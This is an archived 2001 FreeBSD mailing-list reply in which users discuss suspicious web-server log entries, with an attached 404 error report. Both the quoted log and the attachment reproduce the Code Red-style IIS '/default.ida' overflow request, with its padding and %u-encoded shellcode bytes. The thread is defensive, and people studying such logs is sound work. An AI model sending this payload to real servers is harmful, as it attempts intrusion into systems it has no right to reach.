Date: Sat, 4 Aug 2001 20:18:50 -0400 From: Louis LeBlanc <leblanc+freebsd@acadia.ne.mediaone.net> To: questions@FreeBSD.ORG Subject: Re: Attempted Buffer Overrun in via httpd? Message-ID: <20010804201849.A30510@acadia.ne.mediaone.net> In-Reply-To: <E15T58n-000Ayh-00@jdl.com> References: <E15T58n-000Ayh-00@jdl.com>
next in thread | previous in thread | raw e-mail | index | archive | help
--dDRMvlgZJXvWKvBx Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit I got about 100 of these sent to my webmaster account as 404 warnings before deciding to just block ports 80 and 443 for now. It's gotten to be a pain in the ass. Looks like M$ bugs us *nix enthusiasts even if we avoid them altogether :( Check out the message I've attached, it shows pretty much the same request. I'm afraid to look at all the port 80 denials I'll be showing in my logs now! Lou On 08/04/01 12:23 PM, Jon Loeliger sat at the `puter and typed: > Folks, > > I see a large number of httpd requests that look like this: > > 211.41.175.10 - - [03/Aug/2001:23:49:55 -0500] "GET /default.ida?NNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 > %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00= > a HTTP/1.0" 400 316 "-" "-" > > in my httpd access logs. This just smells like an attemtped buffer > over run exploit at work. > > Anyone recognize it and know anything about it? Should I be worried? > I'm running a current (right out of Ports) Apache here. > > Thanks, > jdl > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > -- Louis LeBlanc leblanc@acadia.ne.mediaone.net Fully Funded Hobbyist, KeySlapper Extrordinaire :) http://acadia.ne.mediaone.net ԿԬ management, n.: The art of getting other people to do all the work. --dDRMvlgZJXvWKvBx Content-Type: message/rfc822 Content-Disposition: inline X-Sieve: cmu-sieve 2.0 Return-Path: <nobody> Received: (from nobody@localhost) by acadia.ne.mediaone.net (8.9.3/8.9.3) id KAA02193; Sat, 4 Aug 2001 10:03:37 -0400 Date: Sat, 4 Aug 2001 10:03:37 -0400 Message-Id: <200108041403.KAA02193@acadia.ne.mediaone.net> To: webmaster@acadia.ne.mediaone.net Subject: 404 Error Report From: webmaster@acadia.ne.mediaone.net Reply-To: webmaster@acadia.ne.mediaone.net X-Mailer: PHP/4.0.4 404 Error Report A 404 error was encountered by 65.96.250.172 on 8/4/2001 at 10:3. The URI which generated the error is: http://acadia.ne.mediaone.net/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a The referring page was: --dDRMvlgZJXvWKvBx-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010804201849.A30510>